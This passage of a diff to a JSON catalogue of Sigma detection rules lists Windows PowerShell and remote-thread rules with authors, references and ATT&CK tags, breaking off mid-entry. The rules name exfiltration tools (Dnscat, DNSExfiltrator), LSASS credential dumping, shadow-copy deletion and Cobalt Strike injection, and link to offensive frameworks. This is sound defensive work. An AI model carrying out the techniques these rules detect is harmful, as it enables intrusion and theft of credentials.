"Ilyas Ochkov, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "creation_date": "2022/01/25", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_clear_powershell_history.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clear_powershell_history.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ] + }, + "uuid": "26b692dc-1722-49b2-b496-a8258aa6371d", + "value": "Clear PowerShell History - PowerShell" + }, + { + "description": "Detects usage of the \"Get-AdGroup\" cmdlet to enumerate Groups within Active Directory", + "meta": { + "author": "frack113", + "creation_date": "2022/03/17", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_get_adgroup.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_adgroup.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.002" + ] + }, + "uuid": "8c3a6607-b7dc-4f0d-a646-ef38c00b76ee", + "value": "Active Directory Group Enumeration With Get-AdGroup" + }, + { + "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", + "meta": { + "author": "frack113", + "creation_date": "2022/12/25", + "falsepositive": [ + "Legitimate use of the library" + ], + "filename": "posh_ps_download_com_cradles.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57", + "https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_download_com_cradles.yml" + ], + "tags": "No established tags" + }, + "uuid": "3c7d1587-3b13-439f-9941-7d14313dbdfe", + "value": "Potential COM Objects Download Cradles Usage - PS Script" + }, + { + "description": "Dnscat exfiltration tool execution", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2019/10/24", + "falsepositive": [ + "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" + ], + "filename": "posh_ps_dnscat_execution.yml", + "level": "critical", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_dnscat_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "a6d67db4-6220-436d-8afc-f3842fe05d43", + "value": "Dnscat Execution" + }, + { + "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", + "meta": { + "author": "Sean Metcalf (source), Florian Roth (rule), Bartlomiej Czyz @bczyz1 (update), oscd.community (update), Nasreddine Bencherchali (update), Tim Shelton (fp), Mustafa Kaan Demir (update), Georg Lauenstein (update), Max Altgelt (update), Tobias Michalski (update), Austin Songer (@austinsonger) (update)", + "creation_date": "2017/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_malicious_commandlets.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/", + "https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1", + "https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1", + "https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1", + "https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1", + "https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries", + "https://adsecurity.org/?p=2921", + "https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/", + "https://github.com/calebstewart/CVE-2021-1675", + "https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html", + "https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_malicious_commandlets.yml" + ], + "tags": [ + "attack.execution", + "attack.discovery", + "attack.t1482", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1069.001", + "attack.t1069.002", + "attack.t1069", + "attack.t1059.001" + ] + }, + "uuid": "89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", + "value": "Malicious PowerShell Commandlets - ScriptBlock" + }, + { + "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_via_var.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_var.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "e54f5149-6ba3-49cf-b153-070d24679126", + "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell" + }, + { + "description": "Identifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/25", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_clearing_windows_console_history.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics", + "https://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/", + "https://www.shellhacks.com/clear-history-powershell/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_clearing_windows_console_history.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070", + "attack.t1070.003" + ] + }, + "uuid": "bde47d4b-9987-405c-94c7-b080410e8ea7", + "value": "Clearing Windows Console History" + }, + { + "description": "Adversaries may abuse PowerShell commands and scripts for execution.\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell)\nAdversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/19", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_xml_iex.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-8---powershell-xml-requests", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_xml_iex.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "6c6c6282-7671-4fe9-a0ce-a2dcebdc342b", + "value": "Powershell XML Execute Command" + }, + { + "description": "Detects suspicious PowerShell invocation command parameters", + "meta": { + "author": "Florian Roth (rule), Jonhnathan Ribeiro", + "creation_date": "2017/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_invocation_specific.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_invocation_specific.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", + "value": "Suspicious PowerShell Invocations - Specific" + }, + { + "description": "Detects modifications to the Windows Defender configuration settings using PowerShell to add exclusions", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/16", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_win_defender_exclusions_added.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/windows-defender-exclusions-added-via-powershell.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_win_defender_exclusions_added.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562", + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "c1344fa2-323b-4d2e-9176-84b4d4821c88", + "value": "Windows Defender Exclusions Added - PowerShell" + }, + { + "description": "Detect use of X509Enrollment", + "meta": { + "author": "frack113", + "creation_date": "2022/12/23", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_x509enrollment.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41", + "https://learn.microsoft.com/en-us/dotnet/api/microsoft.hpc.scheduler.store.cx509enrollmentwebclassfactoryclass?view=hpc-sdk-5.1.6115", + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_x509enrollment.yml" + ], + "tags": "No established tags" + }, + "uuid": "504d63cb-0dba-4d02-8531-e72981aace2c", + "value": "Suspicious X509Enrollment - Ps Script" + }, + { + "description": "Detects Commandlet names and arguments from the Nishang exploitation framework", + "meta": { + "author": "Alec Costello", + "creation_date": "2019/05/16", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_nishang_malicious_commandlets.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/samratashok/nishang", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f772cee9-b7c2-4cb2-8f07-49870adc02e0", + "value": "Malicious Nishang PowerShell Commandlets" + }, + { + "description": "Detects suspicious Powershell code that execute COM Objects", + "meta": { + "author": "frack113", + "creation_date": "2022/04/02", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_gettypefromclsid.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md#atomic-test-2---powershell-execute-com-object", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gettypefromclsid.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.persistence", + "attack.t1546.015" + ] + }, + "uuid": "8bc063d5-3a3a-4f01-a140-bc15e55e8437", + "value": "Suspicious GetTypeFromCLSID ShellExecute" + }, + { + "description": "Detects parameters used by WMImplant", + "meta": { + "author": "NVISO", + "creation_date": "2020/03/26", + "falsepositive": [ + "Administrative scripts that use the same keywords." + ], + "filename": "posh_ps_wmimplant.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/FortyNorthSecurity/WMImplant", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmimplant.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.t1059.001" + ] + }, + "uuid": "8028c2c3-e25a-46e3-827f-bbb5abf181d7", + "value": "WMImplant Hack Tool" + }, + { + "description": "Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR.\nThe COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR).\nThese profiliers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.\n(Citation: Microsoft Profiling Mar 2017)\n(Citation: Microsoft COR_PROFILER Feb 2013)\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/30", + "falsepositive": [ + "Legitimate administrative script" + ], + "filename": "posh_ps_cor_profiler.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cor_profiler.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1574.012" + ] + }, + "uuid": "23590215-4702-4a70-8805-8dc9e58314a2", + "value": "Registry-Free Process Scope COR_PROFILER" + }, + { + "description": "DNSExfiltrator allows for transferring (exfiltrate) a file over a DNS request covert channel", + "meta": { + "author": "frack113", + "creation_date": "2022/01/07", + "falsepositive": [ + "Legitimate script" + ], + "filename": "posh_ps_invoke_dnsexfiltration.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/Arno0x/DNSExfiltrator", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048/T1048.md#atomic-test-3---dnsexfiltration-doh", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048" + ] + }, + "uuid": "d59d7842-9a21-4bc6-ba98-64bfe0091355", + "value": "Powershell DNSExfiltration" + }, + { + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_via_use_mhsta.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_mhsta.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "e55a5195-4724-480e-a77e-3ebe64bd3759", + "value": "Invoke-Obfuscation Via Use MSHTA - PowerShell" + }, + { + "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription.", + "meta": { + "author": "frack113", + "creation_date": "2021/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_wmi_persistence.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/data/module_source/persistence/Persistence.psm1#L545", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_wmi_persistence.yml" + ], + "tags": [ "attack.privilege_escalation", "attack.t1546.003" ] }, - "uuid": "0b7889b4-5577-4521-a60a-3376ee7f9f7b", - "value": "WMI Persistence" + "uuid": "9e07f6e7-83aa-45c6-998e-0af26efd0a85", + "value": "Powershell WMI Persistence" + }, + { + "description": "Detects the use of various web request POST or PUT methods (including aliases) via Windows PowerShell command", + "meta": { + "author": "frack113", + "creation_date": "2022/01/07", + "falsepositive": [ + "Legitimate script" + ], + "filename": "posh_ps_upload.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.2", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1020/T1020.md", + "https://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_upload.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1020" + ] + }, + "uuid": "d2e3f2f6-7e09-4bf2-bc5d-90186809e7fb", + "value": "Windows PowerShell Upload Web Request" + }, + { + "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/28", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_office_comobject_registerxll.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137.006/T1137.006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_office_comobject_registerxll.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137.006" + ] + }, + "uuid": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", + "value": "Code Executed Via Office Add-in XLL File" + }, + { + "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", + "meta": { + "author": "frack113", + "creation_date": "2022/03/17", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_directory_enum.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md", + "https://www.mandiant.com/resources/tactics-techniques-procedures-associated-with-maze-ransomware-incidents", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_directory_enum.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1083" + ] + }, + "uuid": "162e69a7-7981-4344-84a9-0f1c9a217a52", + "value": "Powershell Directory Enumeration" + }, + { + "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_get_childitem_bookmarks.yml", + "level": "low", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_get_childitem_bookmarks.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1217" + ] + }, + "uuid": "e0565f5d-d420-4e02-8a68-ac00d864f9cf", + "value": "Automated Collection Bookmarks Using Get-ChildItem PowerShell" + }, + { + "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", + "meta": { + "author": "Tim Rauch", + "creation_date": "2022/09/20", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/volume-shadow-copy-deletion-via-powershell.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_win32_shadowcopy_deletion.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "c1337eb8-921a-4b59-855b-4ba188ddcc42", + "value": "Deletion of Volume Shadow Copies via WMI with PowerShell - PS Script" + }, + { + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "meta": { + "author": "Jonathan Cheong, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_clip.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_clip.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "73e67340-0d25-11eb-adc1-0242ac120002", + "value": "Invoke-Obfuscation CLIP+ Launcher - PowerShell" + }, + { + "description": "Detects a Get-Process command on lsass process, which is in almost all cases a sign of malicious activity", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/04/23", + "falsepositive": [ + "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if unusable)" + ], + "filename": "posh_ps_susp_getprocess_lsass.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/PythonResponder/status/1385064506049630211", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_getprocess_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "84c174ab-d3ef-481f-9c86-a50d0b8e3edb", + "value": "PowerShell Get-Process LSASS in ScriptBlock" + }, + { + "description": "Open a handle on the drive volume via the \\\\.\\ DOS device path specifier and perform direct access read of the first few bytes of the volume.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/09", + "falsepositive": [ + "Legitimate PowerShell scripts" + ], + "filename": "posh_ps_susp_iofilestream.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1006/T1006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_iofilestream.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ] + }, + "uuid": "70ad982f-67c8-40e0-a955-b920c2fa05cb", + "value": "Suspicious IO.FileStream" + }, + { + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_invoke_obfuscation_via_stdin.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/issues/1009", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_invoke_obfuscation_via_stdin.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", + "value": "Invoke-Obfuscation Via Stdin - Powershell" + }, + { + "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", + "meta": { + "author": "oscd.community, @redcanary, Zach Stanford @svch0st", + "creation_date": "2020/10/10", + "falsepositive": [ + "Help Desk or IT may need to manually add a corporate Root CA on occasion. Need to test if GPO push doesn't trigger FP" + ], + "filename": "posh_ps_root_certificate_installed.yml", + "level": "medium", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_root_certificate_installed.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1553.004" + ] + }, + "uuid": "42821614-9264-4761-acfc-5772c3286f76", + "value": "Root Certificate Installed - PowerShell" + }, + { + "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_ps_cl_mutexverifiers_lolscript_count.yml", + "level": "high", + "logsource.category": "ps_script", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/pabraeken/status/995111125447577600", + "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cl_mutexverifiers_lolscript_count.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "6609c444-9670-4eab-9636-fe4755a851ce", + "value": "Execution via CL_Mutexverifiers.ps1 (2 Lines)" + }, + { + "description": "Raw disk access using illegitimate tools, possible defence evasion", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Legitimate Administrator using tool for raw access or ongoing forensic investigation" + ], + "filename": "raw_access_thread_disk_access_using_illegitimate_tools.yml", + "level": "low", + "logsource.category": "raw_access_thread", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/raw_access_thread/raw_access_thread_disk_access_using_illegitimate_tools.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1006" + ] + }, + "uuid": "db809f10-56ce-4420-8c86-d6a7d793c79c", + "value": "Raw Disk Access Using Illegitimate Tools" + }, + { + "description": "Detects a possible remote threat creation with certain characteristics which are typical for Cobalt Strike beacons", + "meta": { + "author": "Olaf Hartong, Florian Roth, Aleksey Potapov, oscd.community", + "creation_date": "2018/11/30", + "falsepositive": [ + "Unknown" + ], + "filename": "create_remote_thread_win_cobaltstrike_process_injection.yml", + "level": "high", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/", + "https://medium.com/@olafhartong/cobalt-strike-remote-threads-detection-206372d11d0f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cobaltstrike_process_injection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1055.001" + ] + }, + "uuid": "6309645e-122d-4c5b-bb2b-22e4f9c2fa42", + "value": "CobaltStrike Process Injection" + }, + { + "description": "Detects the creation of a remote thread from a Powershell process to another process", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Unknown" + ], + "filename": "create_remote_thread_win_powershell_code_injection.yml", + "level": "high", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_powershell_code_injection.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "eeb2e3dc-c1f4-40dd-9bd5-149ee465ad50", + "value": "Accessing WinAPI in PowerShell. Code Injection" + }, + { + "description": "Detects password dumper activity by monitoring remote thread creation EventID 8 in combination with the lsass.exe process as TargetImage.\nThe process in field Process is the malicious program. A single execution can lead to hundreds of events.\n", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/02/19", + "falsepositive": [ + "Antivirus products" + ], + "filename": "create_remote_thread_win_password_dumper_lsass.yml", + "level": "high", + "logsource.category": "create_remote_thread", + "logsource.product": "windows", + "refs": [ + "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/WCE.htm", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_password_dumper_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.s0005", + "attack.t1003.001" + ] + }, + "uuid": "f239b326-2f41-4d6b-9dfa-c846a60ef505", + "value": "Password Dumper Remote Thread in LSASS" }, { "description": "Detects remote thread injection events based on action seen used by bumblebee", @@ -20499,82 +22520,53 @@ "value": "Bumblebee Remote Thread Creation" }, { - "description": "Detects remote thread creation from CACTUSTORCH as described in references.", + "description": "Detects remote thread creation by PowerShell processes into \"lsass.exe\"", "meta": { - "author": "@SBousseaden (detection), Thomas Patzke (rule)", - "creation_date": "2019/02/01", + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/06", "falsepositive": [ "Unknown" ], - "filename": "create_remote_thread_win_cactustorch.yml", + "filename": "create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml", "level": "high", "logsource.category": "create_remote_thread", "logsource.product": "windows", "refs": [ - "https://twitter.com/SBousseaden/status/1090588499517079552", - "https://github.com/mdsecactivebreach/CACTUSTORCH", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_cactustorch.yml" + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_remote_thread/create_remote_thread_win_winapi_in_powershell_credentials_dumping.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1055.012", - "attack.execution", - "attack.t1059.005", - "attack.t1059.007", - "attack.t1218.005" + "attack.credential_access", + "attack.t1003.001" ] }, - "uuid": 